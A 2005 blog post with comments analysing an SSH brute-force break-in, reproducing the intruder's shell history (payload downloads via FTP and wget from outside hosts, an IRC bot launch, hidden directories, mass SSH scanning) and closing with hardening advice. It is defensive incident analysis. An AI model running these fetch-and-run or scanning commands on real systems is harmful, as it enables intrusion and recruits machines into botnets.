Anatomy of an SSH Brute Force Dictionary Attack
Posted: November 28th, 2005 | Author: Administrator | Filed under: Linux, Security | 6 Comments »A few weeks ago I wrote that I had been noticing a large number of attempted SSH brute force dictionary attacks on my server. None were successful but I published some ways to protect yourself. This morning at 8am – a would be hacker succeeded in a dictionary attack – what he left behind was very interesting.
I wrote that my server was safe enough from these attacks and that my passwords were strong and the likelyhood someone could break into the server was virtually nill. There was one problem – I was not the only user of the server. I have several accounts that (well trusted) friends are allowed to use and one of them changed his password so that it matched his username. Since dictionary attacks look for this exact vulnerability when scanning – it did not take long for him to get in. Of course the account was not privileged in *any* way so no serious danger was caused. I was fortunate enough to notice the router lights going crazy this morning before I left for work. Curious as to what was going on, I poked around a bit and noticed a large volume of UDP traffic and figured out that I had been hacked. I immediatley disconnected the WAN port and began to investigate further.
What I found was very interesting and feel that I should share with everyone the anatomy of an SSH brute force hack.
The first thing I did was look at the .bash_history file in the user’s home directory which I shall call joe. The .bash_history is a list of all the commands you have typed in. The following is the content of that file:
ls
ls -lFa
ls
uptime
ls
cd /tmp
ls
cd ". "
passwd
/sbin/ifconfig | grep inet
wget http://www.kernel.org/pub/dist/superrescue/v2/superrescue-2.1.2.iso.gz
ls
rm -rf superrescue-2.1.2.iso.gz
ftp 212.247.250.250
tar xvf bots.tar
cd .bot
PATH="."
inetd
cd /tmp
tar xvf shh.tar
cd shh
ls
./scan 206.77
./scan 206.78
./scan 206.79
[ Note: there were many scan attempts]
c d/tmp
cd /tmp
cd shh
./scan 70.176
./scan 70.177
./scan 70.178
./scan 70.179
./scan 70.180
./scan 70.181
cd /tmp
cd shh
la
ls
cat vuln.txt
./scan 24.55
./scan 24.56
./scan 24.57
./scan 24.58
./scan 24.59
./scan 24.60
./scan 24.61
./scan 24.62
./scan 24.63
./scan 24.64
./scan 24.65
./scan 24.66
./scan 24.67
./scan 24.68
./scan 24.70
./scan 24.71
cd /tmp
cd shh
ls
cat vuln.txt
./scan 61.155
./scan 61.156
./scan 61.157
./scan 61.158
./scan 61.159
./scan 61.160
./scan 61.161
./scan 61.162
./scan 61.163
./scan 61.164
./scan 61.165
./scan 61.166
./scan 61.167
./scan 61.168
./scan 61.169
./scan 61.170
cd /tmp
cd shh
ls
cat vuln.txt
./scan 217.155
./scan 217.156
./scan 217.157
./scan 217.158
./scan 217.159
./scan 217.160
cd /tmp
cd shh
ls
cat vuln.txt
./scan 203.158
./scan 203.159
./scan 203.160
./scan 203.161
./scan 203.162
./scan 203.163
./scan 203.165
./scan 203.168
./scan 203.170
./scan 203.171
./scan 203.172
cd /tmp
cd shh
;s
ls
cat vuln.txt
./scan 192.145
./scan 192.146
./scan 192.147
./scan 192.148
./scan 192.149
./scan 192.150
./scan 192.151
./scan 192.152
./scan 192.153
./scan 192.154
./scan 192.155
./scan 192.156
./scan 192.157
./scan 192.158
./scan 192.159
./scan 192.160
./scan 192.161
./scan 192.162
./scan 192.163
./scan 192.164
./scan 192.165
./scan 192.166
./scan 192.167
./scan 192.168
./scan 192.169
./scan 192.170
./scan 192.171
./scan 192.172
./scan 192.173
./scan 192.174
./scan 192.175
./scan 192.176
./scan 67.45
cd /tmp
cd shh
./scan 67.44
cd /tmp
c dshh
cd shh
ls
cat vuln.txt
./scan 192.177
./scan 192.178
./scan 66.155
./scan 66.156
./scan 66.157
./scan 66.158
./scan 66.159
./scan 66.160
./scan 66.161
./scan 66.162
./scan 66.163
./scan 66.164
./scan 66.165
./scan 66.166
./scan 66.167
./scan 66.168
./scan 66.169
./scan 66.170
./scan 66.171
cd /tmp
cd shh
ls
cat vuln.txt
./scan 81.155
./scan 81.156
./scan 81.157
./scan 81.159
./scan 81.160
./scan 81.161
./scan 81.162
./scan 81.164
./scan 81.165
./scan 128.155
./scan 128.156
./scan 128.157
./scan 128.158
./scan 128.159
./scan 128.160
./scan 128.162
./scan 128.163
./scan 128.164
./scan 128.165
./scan 128.166
./scan 128.167
./scan 128.168
./scan 128.170
./scan 128.171
./scan 128.172
./scan 128.173
./scan 128.174
./scan 128.175
./scan 128.176
./scan 128.177
./scan 128.178
./scan 128.179
./scan 128.180
./scan 128.181
./scan 128.182
./scan 128.183
./scan 128.184
./scan 128.185
c d/tmp
cd /tmp
cd shh
ls
cat vuln.txt
./scan 80.155
./scan 80.156
./scan 80.157
./scan 80.158
./scan 80.159
./scan 213.177
./scan 213.17 8
./scan 213.178
./scan 213.179
./scan 213.180
./scan 213.181
./scan 213.182
./scan 213.183
./scan 213.184
./scan 213.185
./scan 213.186
./scan 213.187
cd /tmp
cd shh
;s
ls
cat vuln.txt
./scan 67.100
./scan 67.101
./scan 67.102
./scan 67.103
./scan 67.104
./scan 67.105
./scan 67.106
What’s going on above? The hacker logged in and checked some things out in the home directory (ls, ls -lFa). Then wanted to seee how long the server had been up for (uptime). Then, the hacker changed the password of the hacked account (passwd) and wanted to see what the IP address was of any interfaces on the machine (/sbin/ifconfig | grep inet).
Next, for some bizarre reason, he wanted to test the internet connection and read/writeability of the home directory (?) by issueing the command wget http://www.kernel.org/pub/dist/superrescue/v2/superrescue-2.1.2.iso.gz. After the file finished downloading, he immediately deleted it (rm -rf superrescue-2.2.2.iso.gz).
Now, he really gets to work by grabbing the necessary tools needed to exploit the server. Using FTP, he goes out and grabs two files, namely bots.tar and shh.tar.
The file size and contents of bots.tar is as follows:
File name: bots.tar
File size: 337920 bytes
Contents: drwxr-xr-x apache/apache 0 2005-08-29 05:26:06 .bot/
-rw-r--r-- apache/apache 65536 2003-03-30 09:04:34 .bot/core
-rwxr-xr-x apache/apache 143683 2003-10-21 10:16:53 .bot/inetd
-rw-r--r-- apache/apache 84 2005-08-29 05:25:36 .bot/mech.users
-rw------- apache/apache 12288 2005-05-09 06:43:43 .bot/.mech.users.swp
-rw-r--r-- apache/apache 22935 2001-04-06 13:00:50 .bot/mech.help
-rw-r--r-- apache/apache 1116 2005-08-29 05:23:08 .bot/mech.session
drwxr-xr-x apache/apache 0 2001-09-06 22:17:30 .bot/randfiles/
-rw-r--r-- apache/apache 830 2001-04-06 13:01:20 .bot/randfiles/randkicks.e
-rw-r--r-- apache/apache 2495 2001-04-06 13:01:34 .bot/randfiles/randpickup.e
-rw-r--r-- apache/apache 55316 2001-04-06 13:15:24 .bot/randfiles/randsay.e
-rw-r--r-- apache/apache 519 2001-04-06 13:01:26 .bot/randfiles/randnicks.e
-rw-r--r-- apache/apache 1465 2001-04-06 13:15:54 .bot/randfiles/randversions.e
-rw-r--r-- apache/apache 633 2001-04-06 13:15:42 .bot/randfiles/randsignoff.e
-rw-r--r-- apache/apache 5195 2001-04-06 13:01:10 .bot/randfiles/randaway.e
-rw-r--r-- apache/apache 2854 2001-04-06 13:01:16 .bot/randfiles/randinsult.e
-rw-r--r-- apache/apache 84 2005-08-29 05:25:52 .bot/mech1.users
-rw-r--r-- apache/apache 942 2001-04-06 13:00:32 .bot/checkmech
-rw-r--r-- apache/apache 84 2005-08-29 05:26:06 .bot/mech2.users
-rw-r--r-- apache/apache 6 2005-05-09 06:56:36 .bot/mech.pid
-rw-r--r-- apache/apache 2857 2005-08-29 05:24:15 .bot/mech.set
-rw-r--r-- apache/apache 1011 2005-05-09 07:00:02 .bot/mech.levels
The file size and contents of shh.tar is as follows:
File name: shh.tar
File size: 1413120 bytes
Contents: drwxr-xr-x support/support 0 2005-11-02 03:16:45 shh/
-rw-rw-r-- support/support 0 2005-11-02 02:50:33 shh/scan.log
-rwxr-xr-x support/support 282 2005-11-02 02:50:12 shh/scan
-rwxr-xr-x support/support 285 2005-11-02 02:49:20 shh/a
-rw-rw-r-- support/support 0 2005-11-02 02:49:36 shh/nobash.txt
-rw-rw-r-- support/support 0 2005-11-02 00:12:23 shh/vuln.txt
-rwxr-xr-x support/support 1384518 2005-06-05 13:24:05 shh/sshd
-rwxr-xr-x support/support 5944 2005-05-15 15:05:13 shh/pscan2
-rw-r--r-- support/support 5797 2005-05-15 14:53:29 shh/pscan2.c
-rw-rw-r-- support/support 2270 2005-11-02 03:16:45 shh/pass.txt
Once bot.tar was untarred, a local inetd daemon was started. I ran the inetd daemon and did a port scan on my own machine to see what port(s) it had opened up. It had created its own IRC server and was listening for commands – indicative of a so-called “Zombie bot” used in Distributed Denial Of Service (DDoS) attacks. Once inetd was loaded, the hacker began using my machine as another base of operations in scanning IP addresses that were also vulnerable to SSH dictionary attacks. After each ./scan X.Y all vulnerable IPs were logged in vuln.txt which is why he dumped out the contents of the file after each scan (cat vuln.txt).
How can you protect your server from such an attack?
Follow these simple guidelines:
1) Use good *strong* passwords (i.e. Six characters, upper AND lower case characters and at least one numeral). If you have other users, assign them a password that is difficult to guess and *do not* let them change it or enforce password rules mentioned above.
2) Disable root logins via SSH
3) Use the firewall rules I posted to drop packets after several failed SSH login attempts in X seconds
Well, thanks a bunch for this. I’ve found your page by looking for vuln.txt and it seems my server was hacked in exactly the same way. Only hacker created a directory ” ” so I didn’t even see the files at first. Thanks for sharing the info. Its good to know I’m not the only one.
Another set of commands from my servers history – I think these guys have some pre written script
624 PATH=”.”
625 mingetty
626 exit 0
627 w
628 passwd
629 cat /proc/cpui nfo
630 cat /proc/cpuinfo
631 w
632 uname -a
633 cat /etc/issue
634 cd /var/tmp
635 ls -a
636 mkdir ” ”
637 cd ” ”
638 wget belea.idilis.ro/5boti
639 wget belea.idilis.ro/5boti.tgz
640 wget belea.idilis.ro/scanner.tgz
641 tar zxvf 5boti.tgz
642 rm -rf 5boti.tgz
643 last
644 ps -x
645 ps -aux
646 id
647 ls
648 cd .f
649 ls
650 rm -f mech.session
651 sh
652 cd ..
653 ls -a
654 tar zxvf scanner.tgz
655 rm -rf scanner.tgz
656 cd scanner
657 ls
658 w
659 last
660 ./a 71.243
661 w
662 ./a 130.166
663 w
664 ls
665 cat /proc/cpuinfo
666 ./a 80.43
667 ./a 141.213
668 w
669 w
670 ./a 132.178
671 ./a 221.133;./a 80.70;./a 67.70
672 w
673 exit
674 pwd
675 cd jakarta-tomcat-5.0.28/
676 ls
677 cd logs
678 tail -f catalina.out
679 exit
680 w
681 last
682 cd /var/tmp
683 cd .2 ”
684 cd .” ”
685 ls -a
686 cd ” ”
687 ls -a
688 cd scanner
689 ls
690 cat vuln.txt
691 ./a 213.25
692 w
693 ./a 213.255
694 w
695 ./a 213.254
696 w
697 ./a 213.253
698 w
699 ./a 213.7
700 ./a 84.152
701 w
702 ./a 82.200
703 ./a 82.2
704 w
705 ./a 213.55
706 w
707 exit
708 w
709 ps -x
710 kill -9 30261
711 w
712 ps -x
713 cd /var/tmp
714 cd .” ”
715 ls -a
716 cd ” ”
717 ls -a
718 cd scanner
719 ls
720 rm -f 128.21.pscan.22 147.127.pscan.22 171.0.pscan.22 171.1.pscan.22 222.10.pscan.22 222.11.pscan.22 222.12.pscan.22 222.13.pscan.22 222.14.pscan.22
721 ls
722 cat vuln.txt
723 rm -f vuln.txt
724 ./a 24.31
725 w
726 ./a 128.135
727 w
728 ./a 219.10
729 ./a 219.11
730 ./a 84.223
731 ./a 84.224
732 ./a 84.22
733 ./a 137.28
734 ./a 130.58
735 ./a 130.126
736 ./a 130.122
737 ./a 140.128
738 ./a 156.236
739 ./a 150.210
740 ./a 150.217
741 ./a 150.218
742 w
743 exit
744 w
745 cd /var/tmp
746 cd .” ”
747 cd ” ”
748 cd scanner
749 ls
750 rm -f 130.122.pscan.22 150.210.pscan.22 150.218.pscan.22 156.236.pscan.22 219.10.pscan.22 219.11.pscan.22 222.15.pscan.22 23.3.pscan.22 84.224.pscan.22 88.146.pscan.22
751 cat vuln.txt
752 tm -f vuln.txt
753 rm -f vuln.txt
754 ls
755 ./a 201.182
756 ./a 204.52
757 w
758 ./a 24.104
759 w
760 ./a 81.7
761 ./a 81.8
762 w
763 ./a 199.237
764 w
765 exit
766 w
767 cd /var/tmp
768 cd .” ”
769 cd ” ”
770 cd scanner
771 ls
772 rm -f 199.237.pscan.22 201.182.pscan.22 mfu.txt
773 ./a 212.182
774 w
775 ./a 213.114
776 w
777 last
778 ./a 218.12
779 ./a 218.13
780 w
781 ./a 217.23
782 ./a 194.254
783 w
784 cd ..
785 ls -a
786 ftp bama.ua.edu
787 ls
788 ftp bama.ua.edu
789 ls
790 w
791 cd scanner
792 ./a 72.177
793 ./a 72.178
794 w
795 w
796 uname a
797 cat /etc/hosts
798 ./a 60.49
799 w
800 ./a 217.204
801 ./a 207.41
802 ./a 207.42
803 w
804 ./a 63.174
805 w
806 ./a 211.21
When u see that .. u bet they are some a*sholes exploiting people stupidity. You should never use passwords like root123, 123456, 1q2w3e, abc123 .. etc .. that\\\’s why they get access to your boxes .. user strong passwords like *@Q*ui122 .. and also remove the nologin accounts .. because they can be used by this kids … they connect to your box using ftp and upload a .php file .. then they run http://ip/~user/file.php (PHP Shell Offender) .. and they can upload bots .. open telnet ports (4040,4000,1414 .. etc) ..
God… guys… thos` are not hackers… are “the biggest lamers”… pff i’m so sorry to hear that u call these hackers…. these are nothing more than some losers from IRC@Undernet… they don’t know a shit about linux they just have scanners made by someone else… they use these scanners and they know only a set of commands… they don’t even know how the scanner works exactly… damn…. anyway try to read this : http://unixcod.org/forum/index.php?topic=12.0 – so u don’t have to worry about these pathetic losers in the future.
losers? lol. You sound disgruntled. perhaps you had this same thing happen to you.
Every Hacker exploits (in some form or another) somones stupidity. It could be a hole in a program, or as simple as a No password/crackable ssh login. Not to mention people… these “lamers” (lol ok..) dont need root account to get root account. Many kernels are exploitable to gain root ax by running a simple app. so its not only a root users login u will need to worry about. (obviously) U get foolish people like Sadox who have had it happen to them, then claim to be the allknowing hacker master. foolish child. and finally, I come to the conclusion of my book. Please…. do not remove my files from your boxes. Have a pleasent day.
Thanks for sharing the information I was actually looking at my SSH logs and decided to do some google searching. I guess that’s one of the problems we faced when sharing a server with other people.